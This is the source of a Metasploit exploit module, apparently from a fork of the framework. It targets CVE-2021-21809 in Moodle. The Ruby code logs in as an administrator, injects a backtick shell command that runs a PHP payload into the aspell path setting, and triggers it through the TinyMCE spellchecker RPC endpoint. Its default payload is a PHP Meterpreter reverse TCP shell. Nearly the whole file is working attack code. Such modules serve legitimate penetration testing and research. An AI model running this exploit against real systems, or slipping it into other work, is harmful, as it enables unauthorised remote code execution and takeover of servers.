adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
cd24ad1bdfd043c17d186d7bcdb5cd146bd1d717
metasploit-gs/modules/exploits/multi/http/moodle_spellcheck_cmd_exec.rb
T
h00die cd24ad1bdf lint
2021-08-27 19:53:45 -04:00

218 lines
6.6 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# require 'rexml/document'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Moodle SpellChecker Authenticated Remote Command Execution',
'Description' => %q{
Moodle allows an authenticated administrator to define spellcheck settings via the web interface.
An administrator can update the aspell path to include a command injection. This is extremely
similar to CVE-2013-3630, just using a different variable.
This module was tested against Moodle version 3.10.0.
},
'License' => MSF_LICENSE,
'Author' => [
'Adam Reiser', # Discovery
'h00die' # msf module
],
'References' => [
['CVE', '2021-21809'],
['URL', 'https://talosintelligence.com/vulnerability_reports/TALOS-2021-1277']
],
'Payload' => {
'BadChars' => "'",
'Default' => 'payload/php/meterpreter/reverse_tcp'
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Automatic', {}]],
'DisclosureDate' => '2021-06-22',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
}
)
)
register_options(
[
OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin']),
OptString.new('PASSWORD', [ true, 'Password to authenticate with', '']),
OptString.new('TARGETURI', [ true, 'The URI of the Moodle installation', '/moodle/'])
]
)
end
def moodle?
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path)
})
return CheckCode::Unknown('No response received from the target.') unless res
if res.body =~ /"moodle":{"name":"moodle",/
return CheckCode::Detected('Moodle instance found, version unknown')
end
CheckCode::Unknown('Website found, unknown service.')
end
def change_aspellpath(value = '')
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),
'vars_get' =>
{
'section' => 'systempaths'
},
'keep_cookies' => true
})
fail_with(Failure::Unreachable, 'Error retrieving settings') unless res
res.body =~ /sesskey":"([^"]+)"/
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),
'vars_get' =>
{
'section' => 'systempaths'
},
'vars_post' =>
{
'section' => 'systempaths',
'action' => 'save-settings',
'sesskey' => Regexp.last_match(1),
'return' => '',
's__pathtophp' => '',
's__pathtodu' => '',
's__aspellpath' => value,
's__pathtodot' => '',
's__pathtogs' => '/usr/bin/gs',
's__pathtopython' => ''
},
'keep_cookies' => true
})
end
def login
cookie_jar.clear
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'login', 'index.php'),
'keep_cookies' => true
})
fail_with(Failure::Unreachable, 'No response received from the target.') unless res
res.body =~ /name="logintoken" value="([^"]+)">/
print_status("Authenticating as user: #{datastore['USERNAME']} with login token #{Regexp.last_match(1)}")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'login', 'index.php'),
'vars_post' =>
{
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'anchor' => '',
'logintoken' => Regexp.last_match(1)
},
'keep_cookies' => true
})
if !res || (res.code != 303) || !res.headers['Location'].include?('testsession=2')
fail_with(Failure::NoAccess, 'Login failed')
end
# follow login
res = send_request_cgi({
'uri' => res.headers['Location'],
'keep_cookies' => true
})
fail_with(Failure::Unreachable, 'No response received from the target.') unless res
end
def set_spellchecker(checker = '')
# '' is None in the gui, and is the default
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),
'vars_get' =>
{
'section' => 'tinymcespellcheckersettings'
},
'keep_cookies' => true
})
fail_with(Failure::Unreachable, 'No response received from the target.') unless res
res.body =~ /sesskey":"([^"]+)"/
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),
'vars_get' =>
{
'section' => 'tinymcespellcheckersettings'
},
'vars_post' =>
{
'section' => 'tinymcespellcheckersettings',
'action' => 'save-settings',
'sesskey' => Regexp.last_match(1),
'return' => '',
's_tinymce_spellchecker_spellengine' => checker,
's_tinymce_spellchecker_spelllanguagelist' => '+English=en,Danish=da,Dutch=nl,Finnish=fi,French=fr,German=de,Italian=it,Polish=pl,Portuguese=pt,Spanish=es,Swedish=sv' # default
},
'keep_cookies' => true
})
fail_with(Failure::Unreachable, 'No response received from the target.') unless res
end
def check
moodle?
end
def exploit
login
print_status('Updating aspell path')
# Site administration, Server, Server, System paths
change_aspellpath("`php -r \"#{payload.encoded}\" &`")
print_status('Changing spell engine to PSpellShell')
set_spellchecker('PSpellShell')
# Administration, Plugins, Text editors, TinyMCE HTML editor, Legacy Spell Checker
spellcheck = '{"id":"c0","method":"checkWords","params":["en",[""]]}'
print_status('Triggering payload')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'lib', 'editor', 'tinymce', 'plugins', 'spellchecker', 'rpc.php'),
'data' => spellcheck,
'ctype' => 'application/json',
'keep_cookies' => true
})
fail_with(Failure::Unreachable, 'Error triggering payload') if res
end
def cleanup
print_status('Sleeping 5 seconds before cleanup')
Rex.sleep(5)
login
print_status('Removing RCE from settings')
change_aspellpath
set_spellchecker
super
end
end
Reference in New Issue View Git Blame Copy Permalink